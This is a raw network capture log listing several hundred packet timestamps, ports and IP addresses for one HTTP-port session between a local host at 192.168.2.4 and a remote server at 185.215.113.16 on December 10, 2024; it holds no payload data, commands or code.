Dec 10, 2024 00:42:40.336047888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.336932898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.337039948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.337099075 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.338025093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.338088036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.338133097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.339114904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.339175940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.339200974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.339241028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.340200901 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.340320110 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.340378046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.341332912 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.341408014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.341468096 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.342381001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.342442036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.342482090 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.342556000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.343513012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.343624115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.343679905 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.344603062 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.344698906 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.344755888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.345670938 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.345773935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.345828056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.346774101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.346872091 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.346919060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.347873926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.347986937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.348037958 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.348959923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.349019051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.349065065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.350061893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.350202084 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.350250006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.351181030 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.351325989 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.351376057 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.352227926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.352281094 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.352303982 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.353321075 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.353352070 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.353377104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.353409052 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.456443071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.456500053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.456542969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.456583977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.456985950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.457026005 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.457067966 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.457107067 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.458086967 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.458127975 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.458245039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.458281040 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.459152937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.459203005 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.492403984 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.492455006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.492494106 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.492592096 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.492913961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.492958069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.492991924 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.493031979 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.494005919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.494049072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.494110107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.494148970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.495137930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.495186090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.495215893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.495253086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.507457018 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.507524014 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.507534981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.507548094 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.507622957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.507636070 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.507673025 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.507806063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.507819891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.507842064 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.507847071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.507860899 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.507867098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.507877111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.507900000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508193970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508205891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508217096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508233070 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508241892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508253098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508264065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508274078 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508281946 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508306980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508671045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508690119 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508718014 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508728027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508800983 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508812904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508822918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508835077 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508842945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508852959 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508865118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.508872032 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508888960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.508917093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.509430885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.509442091 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.509476900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.509641886 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.509684086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.509758949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.509804010 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.510566950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.510603905 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.510622978 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.510657072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.511548042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.511589050 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.511596918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.511630058 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.512634039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.512681007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.512728930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.512765884 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.513736963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.513783932 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.513803959 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.513840914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.514911890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.514955997 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.515010118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.515048027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.515055895 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.515927076 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.515969992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.516028881 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.516079903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.517029047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.517108917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.517148972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.517196894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.518187046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.518246889 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.518429995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.518476009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.519202948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.519251108 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.519320965 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.519366026 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.520306110 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.520355940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.520414114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.520456076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.521373034 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.521423101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.521481037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.521517992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.522485971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.522532940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.522593021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.522635937 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.523627996 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.523669004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.523744106 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.523788929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.524691105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.524734020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.524782896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.524827957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.525772095 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.525820017 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.525876999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.525919914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.526897907 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.526946068 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.527005911 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.527055979 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.528004885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.528070927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.528095007 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.528139114 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.529061079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.529108047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.529180050 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.529222965 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.530168056 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.530214071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.530313969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.530355930 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.531270981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.531331062 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.531394958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.531438112 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.532366991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.532412052 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.532479048 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.532525063 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.533500910 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.533552885 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.533802986 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.533849955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.534534931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.534579039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.534642935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.534689903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.535635948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.535686016 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.535749912 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.535795927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.536783934 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.536834955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.536916018 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.536964893 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.537857056 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.537903070 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.537923098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.537961006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.538985968 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.539032936 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.539057970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.539104939 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.540108919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.540153980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.540195942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.540237904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.541162014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.541204929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.541280985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.541325092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.542218924 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.542264938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.542325974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.542365074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.543292046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.543338060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.543360949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.543401003 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.544389009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.544437885 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.544504881 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.544548035 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.545486927 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.545530081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.545553923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.545597076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.648597956 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.648703098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.648813963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.648814917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.649137974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.649190903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.649240971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.649291992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.650240898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.650290966 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.650374889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.650420904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.651330948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.651374102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.684537888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.684551001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.684730053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.685018063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.685076952 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.685192108 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.685241938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.686115026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.686173916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.686203003 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.686247110 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.687217951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.687275887 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.687295914 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.687345028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.688294888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.688348055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.688375950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.688416958 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.689486980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.689541101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.689577103 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.689616919 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.690491915 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.690536976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.690663099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.690701008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.691576958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.691620111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.691692114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.691732883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.692657948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.692698956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.692778111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.692825079 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.693766117 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.693815947 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.693854094 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.693893909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.694936991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.695002079 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.695018053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.695058107 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.695990086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.696038961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.696111917 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.696155071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.697074890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.697117090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.697130919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.697185040 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.698173046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.698225975 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.698286057 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.698326111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.699263096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.699306965 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.699359894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.699405909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.700422049 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.700473070 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.700498104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.700536013 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:40.701432943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:40.701472998 CET	49759	80	192.168.2.4	185.215.113.16
